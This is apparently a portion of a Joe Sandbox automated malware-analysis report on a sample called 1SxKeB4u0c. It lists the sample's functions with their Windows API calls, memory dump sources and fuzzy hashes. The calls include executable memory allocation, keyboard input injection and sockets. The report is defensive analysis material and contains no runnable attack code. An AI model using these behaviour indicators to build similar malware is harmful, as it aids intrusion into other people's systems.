                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-3689287502
                                                                              • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                              • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                              • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                              • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                              Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-1355242751
                                                                              • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                              • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                              • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                              • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                              Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 2574300362-4033151799
                                                                              • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                              • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                                              • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                              • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                                              Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                              • API String ID: 2574300362-199464113
                                                                              • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                              • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                                              • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                              • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                                              Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                              • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                                              • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                              • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                                              Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                              • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                              • _memmove.LIBCMT ref: 0047E314
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                              • String ID:
                                                                              • API String ID: 3659485706-0
                                                                              • Opcode ID: 6823b43cf6f0b4f92034ae66128ee7f49af346408bcce25e11d99c05b0c1f4e1
                                                                              • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                                              • Opcode Fuzzy Hash: 6823b43cf6f0b4f92034ae66128ee7f49af346408bcce25e11d99c05b0c1f4e1
                                                                              • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                                              Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                              • CoUninitialize.OLE32 ref: 004780CE
                                                                                • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                              • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                              • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                              • String ID:
                                                                              • API String ID: 780911581-0
                                                                              • Opcode ID: 4892ebc2ba5e9205c98ffade9e662b954daa56ad1875162b6822a2177e57cfaa
                                                                              • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                                              • Opcode Fuzzy Hash: 4892ebc2ba5e9205c98ffade9e662b954daa56ad1875162b6822a2177e57cfaa
                                                                              • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                                              Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                              • String ID:
                                                                              • API String ID: 2808897238-0
                                                                              • Opcode ID: 38ad10725147c15b1e4f21466eb185f2c64d29c2f25ddf9cbddee7e661bcca09
                                                                              • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                                              • Opcode Fuzzy Hash: 38ad10725147c15b1e4f21466eb185f2c64d29c2f25ddf9cbddee7e661bcca09
                                                                              • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                                              Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                              • String ID:
                                                                              • API String ID: 2214342067-0
                                                                              • Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                                                              • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                                              • Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                                                              • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                                              Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                              • _strlen.LIBCMT ref: 004764D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen
                                                                              • String ID:
                                                                              • API String ID: 4218353326-0
                                                                              • Opcode ID: 33fc3c5e2e7b16dec64c09e28f5476eec401b79d13ebf29a3bc28ce12cdee682
                                                                              • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                                              • Opcode Fuzzy Hash: 33fc3c5e2e7b16dec64c09e28f5476eec401b79d13ebf29a3bc28ce12cdee682
                                                                              • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                                              Function 02F534FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 02F5354C
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02F535D5
                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02F535E7
                                                                              • __freea.LIBCMT ref: 02F535F0
                                                                                • Part of subcall function 02F532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02F5332C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                              • String ID:
                                                                              • API String ID: 2652629310-0
                                                                              • Opcode ID: cd63baf5102623d5c30563df5249179d63fc55b48b52195438fa09967b052014
                                                                              • Instruction ID: e40d61eda26c7e8cf5536e86b4af6973afca1ae674d828071ee01b0ba94201db
                                                                              • Opcode Fuzzy Hash: cd63baf5102623d5c30563df5249179d63fc55b48b52195438fa09967b052014
                                                                              • Instruction Fuzzy Hash: 3031D472A0022A9BDF259F68DC45DAF7BA5EF403D4F0541A8FE05D7250EB35C954CBA0
                                                                              Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                              • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                              • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                              • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                              Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                              • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                              • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                              • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                              • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                              • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                              • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                              Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                              • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                              • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                              • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                              Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00460C66
                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                              • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00460D33
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
